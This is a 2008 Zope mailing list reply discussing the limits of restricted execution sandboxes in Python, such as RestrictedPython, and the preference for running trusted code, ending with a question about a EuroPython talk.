--On 16. August 2008 13:11:13 +0200 "M.-A. Lemburg" <[EMAIL PROTECTED]> wrote:

In my experience, attempts to create a sandbox that protects
sufficiently against unwanted resource usage are either too
restrictive and slow to make them useful or have problems
preventing DOS attacks.

I think you can't solve the issue with the standard technology we have in CPython. I remember that Python once had a restricted execution environment. Wasn't it buggy as hell? RestrictedPython of Zope surely similar problems. As with all such restricted execution environment (not only in Zope): they are attackable.

It's usually a lot better (and more efficient) to use trusted
code only.

Definitely. A common development pattern is the usage of CMF and portal_skins where you work with PythonScripts on the filesystem. The scripts themselves still run under the control of RestrictedPython however the whole development model can be regarded as being trusted.

BTW: The reason why I had a look at these was that Chris Withers
mentioned at EuroPython that they are currently causing delays
in the Python 2.5 adoption (or at least are one of the reasons
for them).

Is Chris' talk somewhere online?


Attachment: pgptahqF2NbRr.pgp
Description: PGP signature

Zope maillist  -  Zope@zope.org
**   No cross posts or HTML encoding!  **
(Related lists - 
 http://mail.zope.org/mailman/listinfo/zope-dev )

Reply via email to